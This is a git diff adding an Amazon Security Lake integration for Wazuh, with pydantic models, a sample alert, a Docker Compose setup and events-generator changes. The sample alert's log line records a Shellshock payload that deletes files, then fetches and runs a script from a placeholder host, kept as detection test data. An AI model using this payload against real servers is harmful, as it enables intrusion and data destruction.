+    technique: typing.List[str] = []
+    id: typing.List[str] = []
+    tactic: typing.List[str] = []
+
+
+class Rule(pydantic.BaseModel):
+    firedtimes: int = 0
+    description: str = ""
+    groups: typing.List[str] = []
+    id: str = ""
+    mitre: Mitre = Mitre()
+    level: int = 0
+    nist_800_53: typing.List[str] = []
+
+
+class Decoder(pydantic.BaseModel):
+    name: str
+
+
+class Input(pydantic.BaseModel):
+    type: str
+
+
+class Agent(pydantic.BaseModel):
+    name: str
+    id: str
+
+
+class Manager(pydantic.BaseModel):
+    name: str
+
+
+class Event(pydantic.BaseModel):
+    rule: Rule = {}
+    decoder: Decoder = {}
+    input: Input = {}
+    id: str = ""
+    full_log: str = ""
+    agent: Agent = {}
+    timestamp: str = ""
+    location: str = ""
+    manager: Manager = {}
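
These models declare only the fields the integration needs, with permissive defaults, so partial events still validate. A quick illustration (assumes pydantic 2.x, as pinned in requirements.txt):

```python
# Sketch: partial events validate thanks to the permissive defaults above.
import transform.models as models

event = models.wazuh.Event.model_validate_json(
    '{"rule": {"level": 9, "description": "demo"}}'
)
print(event.rule.level)     # 9
print(event.rule.mitre.id)  # [] (default)
```
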
diff --git a/integrations/amazon-security-lake/wazuh-event.sample.json b/integrations/amazon-security-lake/wazuh-event.sample.json
new file mode 100644
index 0000000000000..d7e0558b62c62
--- /dev/null
+++ b/integrations/amazon-security-lake/wazuh-event.sample.json
@@ -0,0 +1,76 @@
+{
+  "input": {
+    "type": "log"
+  },
+  "agent": {
+    "name": "redacted.com",
+    "id": "000"
+  },
+  "manager": {
+    "name": "redacted.com"
+  },
+  "data": {
+    "protocol": "GET",
+    "srcip": "000.111.222.10",
+    "id": "404",
+    "url": "/cgi-bin/jarrewrite.sh"
+  },
+  "rule": {
+    "firedtimes": 1,
+    "mail": false,
+    "level": 6,
+    "pci_dss": [
+      "11.4"
+    ],
+    "tsc": [
+      "CC6.1",
+      "CC6.8",
+      "CC7.2",
+      "CC7.3"
+    ],
+    "description": "Shellshock attack attempt",
+    "groups": [
+      "web",
+      "accesslog",
+      "attack"
+    ],
+    "mitre": {
+      "technique": [
+        "Exploitation for Privilege Escalation",
+        "Exploit Public-Facing Application"
+      ],
+      "id": [
+        "T1068",
+        "T1190"
+      ],
+      "tactic": [
+        "Privilege Escalation",
+        "Initial Access"
+      ]
+    },
+    "id": "31166",
+    "nist_800_53": [
+      "SI.4"
+    ],
+    "info": "CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271",
+    "gdpr": [
+      "IV_35.7.d"
+    ]
+  },
+  "location": "/var/log/nginx/access.log",
+  "decoder": {
+    "name": "web-accesslog"
+  },
+  "id": "1707402914.872885",
+  "GeoLocation": {
+    "city_name": "Amsterdam",
+    "country_name": "Netherlands",
+    "region_name": "North Holland",
+    "location": {
+      "lon": 4.9087,
+      "lat": 52.3534
+    }
+  },
+  "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"",
+  "timestamp": "2024-02-08T11:35:14.334-0300"
+}
\ No newline at end of file
diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml
new file mode 100644
index 0000000000000..65a8905bcd987
--- /dev/null
+++ b/integrations/docker/amazon-security-lake.yml
@@ -0,0 +1,115 @@
+version: "3.8"
+name: "amazon-security-lake"
+services:
+  events-generator:
+    image: wazuh/indexer-events-generator
+    build:
+      context: ../tools/events-generator
+    container_name: events-generator
+    depends_on:
+      wazuh.indexer:
+        condition: service_healthy
+    command: bash -c "python run.py -a wazuh.indexer"
+
+  wazuh.indexer:
+    image: opensearchproject/opensearch:2.11.1
+    container_name: wazuh.indexer
+    depends_on:
+      wazuh-certs-generator:
+        condition: service_completed_successfully
+    hostname: wazuh.indexer
+    ports:
+      - 9200:9200
+    environment:
+      # - cluster.name=opensearch-cluster
+      - node.name=wazuh.indexer
+      - discovery.type=single-node
+      # - cluster.initial_cluster_manager_nodes=opensearch-node
+      - bootstrap.memory_lock=true
+      - "DISABLE_INSTALL_DEMO_CONFIG=true"
+      - plugins.security.ssl.http.enabled=true
+      - plugins.security.allow_default_init_securityindex=true
+      - plugins.security.ssl.http.pemcert_filepath=/usr/share/opensearch/config/wazuh.indexer.pem
+      - plugins.security.ssl.transport.pemcert_filepath=/usr/share/opensearch/config/wazuh.indexer.pem
+      - plugins.security.ssl.http.pemkey_filepath=/usr/share/opensearch/config/wazuh.indexer-key.pem
+      - plugins.security.ssl.transport.pemkey_filepath=/usr/share/opensearch/config/wazuh.indexer-key.pem
+      - plugins.security.ssl.http.pemtrustedcas_filepath=/usr/share/opensearch/config/root-ca.pem
+      - plugins.security.ssl.transport.pemtrustedcas_filepath=/usr/share/opensearch/config/root-ca.pem
+      - plugins.security.authcz.admin_dn="CN=wazuh.indexer,OU=Wazuh,O=Wazuh,L=California, C=US"
+      - "OPENSEARCH_JAVA_OPTS=-Xms512m -Xmx512m"
+    ulimits:
+      memlock:
+        soft: -1
+        hard: -1
+      nofile:
+        soft: 65536
+        hard: 65536
+    healthcheck:
+      test: curl -sku admin:admin https://localhost:9200/_cat/health | grep -q docker-cluster
+      start_period: 10s
+      start_interval: 3s
+    volumes:
+      - data:/usr/share/opensearch/data
+      - ./certs/wazuh.indexer.pem:/usr/share/opensearch/config/wazuh.indexer.pem
+      - ./certs/wazuh.indexer-key.pem:/usr/share/opensearch/config/wazuh.indexer-key.pem
+      - ./certs/root-ca.pem:/usr/share/opensearch/config/root-ca.pem
+
+  wazuh.dashboard:
+    image: opensearchproject/opensearch-dashboards:2.11.1
+    container_name: wazuh.dashboard
+    depends_on:
+      - wazuh.indexer
+    hostname: wazuh.dashboard
+    ports:
+      - 5601:5601 # Map host port 5601 to container port 5601
+    expose:
+      - "5601" # Expose port 5601 for web access to OpenSearch Dashboards
+    environment:
+      OPENSEARCH_HOSTS: '["https://wazuh.indexer:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query
+
+  wazuh.integration.security.lake:
+    image: wazuh/indexer-security-lake-integration
+    build:
+      context: ../amazon-security-lake
+    container_name: wazuh.integration.security.lake
+    depends_on:
+      - wazuh.indexer
+    hostname: wazuh.integration.security.lake
+    environment:
+      LOG_LEVEL: trace
+      LOGSTASH_KEYSTORE_PASS: "SecretPassword"
+      MONITORING_ENABLED: false
+      AWS_KEY: "AKIAIOSFODNN7EXAMPLE"
+      AWS_SECRET: "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
+    ports:
+      - "5000:5000/tcp"
+      - "5000:5000/udp"
+      - "5044:5044"
+      - "9600:9600"
+    volumes:
+      - ../amazon-security-lake/logstash/pipeline:/usr/share/logstash/pipeline
+      - ./certs/root-ca.pem:/usr/share/logstash/root-ca.pem
+    # command: tail -f /dev/null
+    command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash --config.reload.automatic
+
+  s3.ninja:
+    image: scireum/s3-ninja:latest
+    container_name: s3.ninja
+    hostname: s3.ninja
+    ports:
+      - "9444:9000"
+    volumes:
+      - s3-data:/home/sirius/data
+
+  wazuh-certs-generator:
+    image: wazuh/wazuh-certs-generator:0.0.1
+    hostname: wazuh-certs-generator
+    container_name: wazuh-certs-generator
+    entrypoint: sh -c "/entrypoint.sh; chown -R 1000:999 /certificates; chmod 740 /certificates; chmod 440 /certificates/*"
+    volumes:
+      - ./certs/:/certificates/
+      - ./config/certs.yml:/config/certs.yml
+
+volumes:
+  data:
+  s3-data:
diff --git a/integrations/docker/config/certs.yml b/integrations/docker/config/certs.yml
new file mode 100644
index 0000000000000..c3e017be10eea
--- /dev/null
+++ b/integrations/docker/config/certs.yml
@@ -0,0 +1,16 @@
+nodes:
+  # Wazuh indexer server nodes
+  indexer:
+    - name: wazuh.indexer
+      ip: wazuh.indexer
+
+  # Wazuh server nodes
+  # Use node_type only with more than one Wazuh manager
+  server:
+    - name: wazuh.manager
+      ip: wazuh.manager
+
+  # Wazuh dashboard node
+  dashboard:
+    - name: wazuh.dashboard
+      ip: wazuh.dashboard
diff --git a/integrations/tools/events-generator/.dockerignore b/integrations/tools/events-generator/.dockerignore
new file mode 100644
index 0000000000000..0f028b576338e
--- /dev/null
+++ b/integrations/tools/events-generator/.dockerignore
@@ -0,0 +1,2 @@
+.venv
+Dockerfile
\ No newline at end of file
diff --git a/integrations/tools/events-generator/Dockerfile b/integrations/tools/events-generator/Dockerfile
new file mode 100644
index 0000000000000..da32f8c042017
--- /dev/null
+++ b/integrations/tools/events-generator/Dockerfile
@@ -0,0 +1,4 @@
+FROM python:3.9
+COPY . /home/events-generator/
+WORKDIR /home/events-generator
+RUN pip install -r requirements.txt
\ No newline at end of file
diff --git a/integrations/tools/events-generator/README.md b/integrations/tools/events-generator/README.md
index b11988192929e..ed8e53ea8acd9 100644
--- a/integrations/tools/events-generator/README.md
+++ b/integrations/tools/events-generator/README.md
@@ -41,3 +41,14 @@ INFO:event_generator:Event created
 INFO:event_generator:Event created
 {'_index': 'wazuh-alerts-4.x-2024.02.13-000001', '_id': 'eRWno40BZRXLJU5t4u66', '_version': 1, 'result': 'created', '_shards': {'total': 2, 'successful': 2, 'failed': 0}, '_seq_no': 172, '_primary_term': 1}
 ```
+
+### Building the Docker image
+
+```console
+docker build -t wazuh/indexer-events-generator:latest .
+```
+
+Run with: 
+```console
+docker run -it --name=wazuh-indexer-events-generator --rm wazuh/indexer-events-generator python run.py -h
+```
\ No newline at end of file
diff --git a/integrations/tools/events-generator/run.py b/integrations/tools/events-generator/run.py
index 3a6a4aeba9fc0..ec4ded0010c76 100644
--- a/integrations/tools/events-generator/run.py
+++ b/integrations/tools/events-generator/run.py
@@ -1,4 +1,4 @@
-#!/usr/bin/pyton
+#!/usr/bin/python3
 
 # Events generator tool for Wazuh's indices.
 # Chooses a random element from <index>/alerts.json to index
@@ -42,9 +42,11 @@ def __init__(self, path: str):
             self.size = len(self.elements)
 
     def get_random(self) -> str:
+        """
+        Returns a random element: shuffles the list in place and returns its last element without removing it.
+        """
         random.shuffle(self.elements)
-        return self.elements.pop()
-        # return self.elements[random.randint(0, self.size)]
+        return self.elements[self.size-1]
 
 # ================================================== #
 
@@ -136,6 +138,11 @@ def parse_args():
     parser = argparse.ArgumentParser(
         description="Events generator tool for Wazuh's indices. Indexes a random element from <index>/alerts.json",
     )
+    parser.add_argument(
+        '-i', '--index',
+        default="wazuh-alerts-4.x-sample",
+        help="Destination index name or alias"
+    )
     parser.add_argument(
         '-o', '--output',
         choices=['indexer', 'filebeat'],
@@ -143,9 +150,9 @@ def parse_args():
         help="Destination of the events. Default: indexer."
     )
     parser.add_argument(
-        '-i', '--index',
+        '-m', '--module',
         default="wazuh-alerts",
-        help="Index name or module (e.g: wazuh-alerts, wazuh-states-vulnerabilities)"
+        help="Wazuh module to read the alerts from (e.g: wazuh-alerts, wazuh-states-vulnerabilities). Must match a subfolder's name."
     )
     # Infinite loop by default
     parser.add_argument(
@@ -189,7 +196,7 @@ def parse_args():
 
 
 def main(args: dict):
-    inventory = Inventory(f"{args['index']}/alerts.json")
+    inventory = Inventory(f"{args['module']}/alerts.json")
     logger.info("Inventory created")
     publisher = PublisherCreator.create(args["output"], args)
     logger.info("Publisher created")